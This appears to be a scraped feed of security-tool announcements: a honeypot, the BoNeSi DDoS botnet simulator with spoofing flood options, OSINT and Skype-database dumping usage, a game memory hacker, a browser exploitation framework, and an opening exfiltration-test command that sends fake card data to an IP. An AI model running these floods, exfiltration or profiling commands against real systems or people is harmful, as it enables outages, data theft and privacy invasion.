./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc



HoneyPy - A Low To Medium Interaction Honeypot

$
0
0

A low interaction honeypot with the capability to be more of a medium interaction honeypot.
HoneyPy is written in Python2 and is intended to be easy to:
  • install and deploy
  • extend with plugins and loggers
  • run with custom configurations
Feel free to follow the QuickStart Guide to dive in directly. The main documentation can be found at the HoneyPy Docs site.
Live HoneyPy data gets posted to:
Leave an issue or feature request! Use the GitHub issue tracker to tell us whats on your mind.
Pull requests are welcome! If you would like to create new plugins or improve existing ones, please do.
NOTE: HoneyPy has primarily been tested and run on Debian and Ubuntu using Python 2.7.9.

Overview
HoneyPy comes with a lot of plugins included. The level of interaction is determined by the functionality of the used plugin. Plugins can be created to emulate UDP or TCP based services to provide more interaction. All activity is logged to a file by default, but posting honeypot activity to Twitter or a web service endpoint can be configured as well.
Examples:
  • Plugins:
    • ElasticSearch
    • SIP
    • etc.
  • Loggers:
    • HoneyDB
    • Twitter
    • etc.


BoNeSi - The DDoS Botnet Simulator

$
0
0

BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.

What traffic can be generated?

BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly configurable and rates, data volume, source IP addresses, URLs and other parameters can be configured.



What makes it different from other tools?
There are plenty of other tools out there to spoof IP addresses with UDP and ICMP, but for TCP spoofing, there is no solution. BoNeSi is the first tool to simulate HTTP-GET floods from large-scale bot networks. BoNeSi also tries to avoid to generate packets with easy identifiable patterns (which can be filtered out easily).

Where can I run BoNeSi?
We highly recommend to run BoNeSi in a closed testbed environment. However, UDP and ICMP attacks could be run in the internet as well, but you should be carefull. HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi.

How does TCP Spoofing work?

BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi



How good is the perfomance of BoNeSi?
We focused very much on performance in order to simulate big botnets. On an AMD Opteron with 2Ghz we were able to generate up to 150,000 packets per second. On a more recent AMD Phenom II X6 1100T with 3.3Ghz you can generate 300,000 pps (running on 2 cores).

Are BoNeSi attacks successful?
Yes, they are very successful. UDP/ ICMP attacks can easily fill the bandwidth and HTTP-Flooding attacks knock out webservers fast. We also tested BoNeSi against state-of-the-art commercial DDoS mitigation systems and where able to either crash them or hiding the attack from being detected.

A demo video of BoNeSi in action can be found here.

Detailed Information
BoNeSi is a network traffic generator for different protocol types. The attributes of the created packets and connections can be controlled by several parameters like send rate or payload size or they are determined by chance. It spoofs the source ip addresses even when generating tcp traffic. Therefor it includes a simple tcp-stack to handle tcp connections in promiscuous mode. For correct work, one has to ensure that the response packets are routed to the host at which BoNeSi is running. Therefore BoNeSi cannot used in arbitrary network infrastructures. The most advanced kind of traffic that can be generated are http requests.
TCP/HTTP In order to make the http requests more realistic, several things are determined by chance:
  • source port
  • ttl: 3..255
  • tcp options: out of seven different real life options with different lengths and probabilities
  • user agent for http header: out of a by file given list (an example file is included, see below)
Copyright 2006-2007 Deutsches Forschungszentrum fuer Kuenstliche Intelligenz This is free software. Licensed under the Apache License, Version 2.0. There is NO WARRANTY, to the extent permitted by law.

Installation
:~$ ./configure
:~$ make
:~$ make install

Usage
:~$ bonesi [OPTION...] <dst_ip:port>

Options:

-i, --ips=FILENAME filename with ip list
-p, --protocol=PROTO udp (default), icmp or tcp
-r, --send_rate=NUM packets per second, 0 = infinite (default)
-s, --payload_size=SIZE size of the paylod, (default: 32)
-o, --stats_file=FILENAME filename for the statistics, (default: 'stats')
-c, --max_packets=NUM maximum number of packets (requests at tcp/http), 0 = infinite (default)
--integer IPs are integers in host byte order instead of in dotted notation
-t, --max_bots=NUM determine max_bots in the 24bit prefix randomly (1-256)
-u, --url=URL the url (default: '/') (only for tcp/http)
-l, --url_list=FILENAME filename with url list (only for tcp/http)
-b, --useragent_list=FILENAME filename with useragent list (only for tcp/http)
-d, --device=DEVICE network listening device (only for tcp/http, e.g. eth1)
-m, --mtu=NUM set MTU, (default 1500). Currently only when using TCP.
-f, --frag=NUM set fragmentation mode (0=IP, 1=TCP, default: 0). Currently only when using TCP.
-v, --verbose print additional debug messages
-h, --help print help message and exit

Additionally Included Example Files
50k-bots
  • 50,000 ip addresses generated randomly to use with --ips option
browserlist.txt
  • several browser identifications to use with --useragentlist option
urllist.txt
  • several urls to use with --urllist option


Maltego CE - An Interactive Data Mining Tool That Renders Directed Graphs For Link Analysis

$
0
0

Maltego CE is the community version of Maltego that is available for free after a quick online registration. Maltego CE includes most of the same functionality as the commercial version however it has some limitations. The main limitation with the community version is that the application cannot be used for commercial purposes and there is also a limitation on the maximum number of entities that can be returned from a single transform. In the community version of Maltego there is no graph export functionality that is available in the commercial versions.

What does Maltego do?


The focus of Maltego is analyzing real-world relationships between information that is publically accessible on the Internet. This includes footprinting Internet infrastructure as well as gathering information about the people and organisation who own it. 

Maltego can be used to determine the relationships between the following entities:

  • People.
    • Names.
    • Email addresses.
    • Aliases.
  • Groups of people (social networks).
  • Companies.
  • Organizations.
  • Web sites.
  • Internet infrastructure such as:
    • Domains.
    • DNS names.
    • Netblocks.
    • IP addresses.
  • Affiliations.
  • Documents and files.

Connections between these pieces of information are found using open source intelligence (OSINT) techniques by querying sources such as DNS records, whois records, search engines, social networks, various online APIs and extracting meta data. 

Maltego provides results in a wide range of graphical layouts that allow for clustering of information which makes seeing relationships instant and accurate – this makes it possible to see hidden connections even if they are three or four degrees of separation apart.

Maltego CE Features:

  • The ability to perform link analysis on up to 10 000 entities on a single graph.
  • The capability to return up to 12 entities per transform that is run.
  • Includes collection nodes which automatically group entities together with common features allowing you to see passed the noise and find the key relationships you are looking for.
  • Includes the ability to share graphs in real-time with multiple analysts in a single session.
  • Graph export options include:
    • GraphML.
    • Entity lists.
  • Graph import options include:
    • Tablular formats - csv, xlx and xlsx.
    • Copy and paste.

Technical Details:

  • Maltego CE is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
  • Hardware Requirements:
    • A Maltego CE client requires at least 2GB of RAM, but the more the merrier as Maltego loves memory.
    • Any modern multi-core processor will have more than enough processing power.
    • 4GB of disk space should be more than enough.
    • Using a mouse makes navigating Maltego graphs much easier and is definitely recommended.

  • Network Requirements:
    • A Maltego CE client requires Internet Access to operate fully.
    • The client will need to make outgoing connections on the following ports: 80, 443, 8081. Additionally port 5222 is needed to join shared graphs on Paterva's public Comms server.
    • Please note that a Maltego client may need to make connections on additional ports if the client is using transform from 3rd party transform vendors from the Transform Hub.



OSINT-SPY - Search using OSINT (Open Source Intelligence)

$
0
0

Performs OSINT scan on email/domain/ip_address/organization using OSINT-SPY. It can be used by Data Miners, Infosec Researchers, Penetration Testers and cyber crime investigator in order to find deep information about their target.

OSINT-SPY Documentation (beta)
File Name     :     README
Author : @sk_security
Version : 0.0.1
Website : osint-spy.com

Overview of this tool:
  • Perform scan on IP Address / domain / email address / BTC(bitcoin) address / device
  • Find out latest bitcoin block information
  • List out all the ciphers supported by particular website and server
  • Check whether a particular website is vulnerable to heartbleed or not ?
  • Dump all the contacts and messages from skype database
  • Analyze malware or malicous file remotely

Licenses information
OSINT-SPY and its documents are covered with GPL-3.0 (General Public License v3.0)

Using OSINT-SPY
   @@@@@@@@@     @@@@@@@@@  |  @@      @  88888|88888       @@@@@@@@@  8@@@@@@@@  8           @
88888888888 | | @ @ @ | | 8 @ 8 @
@@@@@@@@@@@ | | @ @ @ | | 8 @ 8 @
88888888888 |@@@@@@@@ | @ @ @ | ---- |@@@@@@@@ 8@@@@@@@@ 8 @
@@@@@@@@@@@ | | @ @ @ | | 8 @
@@@@@@@@@@@ | | @ @ @ | | 8 @
888888888 @@@@@@@@| | @ @@ | @@@@@@@@| 8 @


Search using OSINT
Website: www.osint-spy.com

Usage: osint-spy.py [options]
Options:
-h, --help show this help message and exit.
--btc_block Find latest Bitcoin blockchain info.
--btc_date Find Bitcoin blockchain information from given date.
--btc_address Find out balance and transaction information of given bitcoin address.
--ssl_cipher List out all the ciphers used by given server.
--ssl_bleed Check whether server is vulnerable to heart bleed flaw or not.
--domain Get bunch of detail of given website or organization.
--email Gather information of a given email address.
--device Find out devices which are connected to internet.
--ip Enumerate information from given IP Addresss.
--skype_db Give the location of skype database in order to fetch all the information from that including chats and contacts.
--malware Find out whether a given file is infected by malware or not.
--carrier Give path of carrier file behind which you want to add text.
--setgo_text Enter text to hide behind carrier file.
--stego_find Give a stego file and it will try to find hidden text.

Required setup
  • Python 2.7
  • Use install_linux.py (for installing all dependencies and libraries on linux)
  • Use install_windows.py (for installing all dependencies and libraries on windows)

Contributors
1. Sharad Kumar - @sk_security <twitter handler>

Documentation

Setting up the enviornment
Installing and using OSINT-SPY is very easy.Installation process is very simple and is of 4 steps.
1.Downloading or cloning OSINT-SPY github repository.
2.Downloading and installing all dependencies.
3.Generating API Keys
4.Adding API Keys in config file

Let's Begin !!

Step 1 - Download OSINT-PSY on your system.

In order to install OSINT-SPY simply clone the github repository.Below is the command which you can use in order to clone OSINT-SPY repository.
git clone https://github.com/SharadKumar97/OSINT-SPY.git
Step 2 - Downloading and Installing dependencies.

Once you clone OSINT-SPY, you will find one directory name as OSINT-SPY. Just go that directory and install dependencies. If you are using OSINT-SPY on windows then run install_linux.py file and if you are using linux then run install_linux.py
python install_linux.py

OR
python install_windows.py

Generating API Keys
We need some API Keys before using this tool.Following are the API's which we are using in this tool for a time being.
1.Clearbit API
2.Shodan API
3.Fullcontact API
4.Virus_Total API
5.EmailHunter API

Clearbit API

Register yourself at Clearbitand activate your account.
Once you login, you will find one section of API. Go there and copy your secret API Key and paste inside config.py file.
Config.py file can be find in modules directory of OSINT-SPY.



Shodan API

Register yourself at Shodan and activate your account.
Once you activated your account then login to Shodan.
Once you login, you will find an API key in overview tab.
Copy that key and paste inside config.py file.



FullContact API

Register yourself at Full Contact. You can sign up by using your email or you can Sign Up with Google.
Once you login, you will find your API Key on front of your dashboard.
Just copy that key and paste it inside config.py file.



VirusTotal API

Register yourself at VirusTotal.
Once you login, you will find My Api Key section in your profile menu. Just go there and copy your public API Key and paste in config.py file.



EmailHunter API

Register yourself at Email Hunter .
Once you login, go to API tab and click on EYE icon to view your API Key.
Copy your API Key in config.py file.


Usage
OSINT-SPY is very handy tool and easy to use.All you have to do is just have to pass values to parameter.In order to start OSINT-SPY just write -- 
python osint-spy.com

--btc_block

--btc_block parameter gives you the information of latest bitcoin block chain.

Usage:
python osint-spy.py --btc_block

--btc_date

--btc_date parameter will give you an information of bitcoin block chain from given date.

Usage:
python osint-spy.py --btc_date 20170620

--btc_address

--btc_address will give you an information about particular bitcoin owner.

python osint-spy.py --btc_address 1DST3gm6JthxhuoNKFqXrdpzPFfz1WgHpW

--ssl_cipher

--ssl_cipher will show you all the ciphers supported by given website.

python osint-spy.py --ssl_cipher google.com

--ssl_bleed

--ssl_bleed will find out whether given website is vulnerable to heartbleed or not ? .

python osint-spy.py --ssl_bleed google.com

--domain

--domain will give you in depth-information about particular domain including whois,dns,ciphers,location and so more.

python osint-spy.py --domain google.com

--email

--email will gather information about given email address from various public sources.

python osint-spy.py --email david@toorcon.org

--device

--device will search for a given device from shodan and will list out all the available devices on public IP.

python osint-spy.py --device webcam

--ip

--ip will gather all the information of given IP Address from public sources.

python osint-spy.py --ip 127.0.0.1

--skype_db

--skype_db will find out all the contacts and message history from given skype database.This can be useful for forensics investigator.In Windows,Skype database can be found in AppData\Roaming\Skype\(Your username)\main.db and in Mac OSX , database can be found in /Users/(Your mac user anme)/Library/Support/Skype/(your skyoe username)/main.db

python osint-spy.py --skype_db main.db

--malware

--malware will send a given piece of file to virustotal and will give you a result whether given file is malware or not? .

python osint-spy.py --malware abc.exe

--carrier and --stego_text

--carrier and --stego_text are used to hide text behind any image.
--carrier will specify the image behind which you want to hide the text.
--stego_text will specify the text you want to add.

python osint-spy.py --carrier image.jpg --stego_text This_is_secre_text

--stego_find

--stego_find will find out hidden text behind any image.

python osint-spy.py --stego_find hidden.jpg


GameGuardian - Android Game Hack/Alteration Tool

$
0
0


GameGuardian is a game hack/alteration tool. With it, you can modify money, HP, SP, and much more. You can enjoy the fun part of a game without suffering from its unseasonable design.

Requires Android: 2.3.3+

GameGuardian Features Summary
  • Runs on ARM, x64 and x86 devices, including x86 emulators (LDPlayer, BlueStacks, Droid4X, MOMO, KOPlayer, Andy, Memu, Leapdroid, AMIDuOS, Windroye, RemixOS, PhoenixOS, AVD, Genymotion, Nox etc.)
  • Supports Android 2.3.3+ (Gingerbread) through Lollipop (5+), Marshmallow (6+), Nougat (7+), Oreo (8+) and Pie (9+).
  • Support work without root via different virtual spaces.
  • Support different emulators like PPSSPP, ePSXe, GameBoy etc.
  • Game deceleration and acceleration (speedhack) for ARM and x86 devices, including x86 emulators.  Also supports both 32-bit and 64-bit applications on 64-bit devices using speedhack.
  • Search feature: encrypted values.
  • Search of unknown values when specifying the difference between values.
  • Search addresses by mask.
  • Explicit and "fuzzy" numeric searches.
  • Text (String, Hex, AoB) search.
  • Supports: Double, Float, Qword, Dword, XOR, Word, Byte, or Auto data-type searches.
  • Lua scripting support.
  • Modify all search results at once.
  • Filtering of search results (address greater than and less than, value greater than and less than).
  • Search in the background feature.
  • 'The fill' feature.
  • Time jump feature.
  • Dump memory.
  • Copy memory.
  • Customizable UI.
  • App locale for over 50 languages.
  • And, much, much more.

Notes:

** ROOT or VIRTUAL ENVIRONMENT ONLY **
This tool only works on rooted devices or in virtual environment (without root in limited mode)!
GG can work in limited mode without root, through a virtual environment. For example, through Parallel Space, VirtualXposed, Parallel Space Lite, GO multiple, 2Face and many others.
Read the help for more details. You can find more information about rooting your device at XDA Developers.


SecLists - A Collection Of Multiple Types Of Lists Used During Security Assessments, Collected In One Place (Usernames, Passwords, URLs, Sensitive Data Patterns, Fuzzing Payloads, Web Shells, And Many More)

$
0
0

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
This project is maintained by Daniel Miessler, Jason Haddix, and g0tmi1k.

Install
Zip
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip
Git (Small)
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
Git (Complete)
git clone git@github.com:danielmiessler/SecLists.git
Kali Linux (Tool Page)
apt -y install seclists


Eraser - Secure Erase Files from Hard Drives on Windows

$
0
0

Eraser is an advanced security tool for Windows which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Eraser is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7, 8, 10 and Windows Server 2012.

Why Use Eraser?

Most people have some data that they would rather not share with others – passwords, personal information, classified documents from work, financial records, self-written poems, the list continues.

Perhaps you have saved some of this information on your computer where it is conveniently at your reach, but when the time comes to remove the data from your hard disk, things get a bit more complicated and maintaining your privacy is not as simple as it may have seemed at first.

Your first thought may be that when you ‘delete’ the file, the data is gone. Not quite, when you delete a file, the operating system does not really remove the file from the disk; it only removes the reference of the file from the file system table. The file remains on the disk until another file is created over it, and even after that, it might be possible to recover data by studying the magnetic fields on the disk platter surface.

Before the file is overwritten, anyone can easily retrieve it with a disk maintenance or an undelete utility.

Eraser Features

It works with Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7,8,10 and Windows Server 2012.Windows 98, ME, NT, 2000 can still be used with version 5.7!.It works with any drive that works with Windows.Secure drive erasure methods are supported out of the box.Erases files, folders and their previously deleted counterparts.Works with an extremely customisable Scheduler.


BeEF - The Browser Exploitation Framework Project

$
0
0

What is BeEF?
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Get Involved
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web:https://beefproject.com/
Bugs:https://github.com/beefproject/beef/issues
Security Bugs:security@beefproject.com
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject

Requirements

Quick Start
The following is for the impatient.
The install script installs the required operating system packages and all the prerequisite Ruby gems:
$ ./install
For full installation details, please refer to INSTALL.txt.
We also have an Installation page on the wiki.
Upon successful installation, be sure to read the Configuration page on the wiki for important details on configuring and securing BeEF.

Usage
To get started, simply execute beef and follow the instructions:
   $ ./beef

Video


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>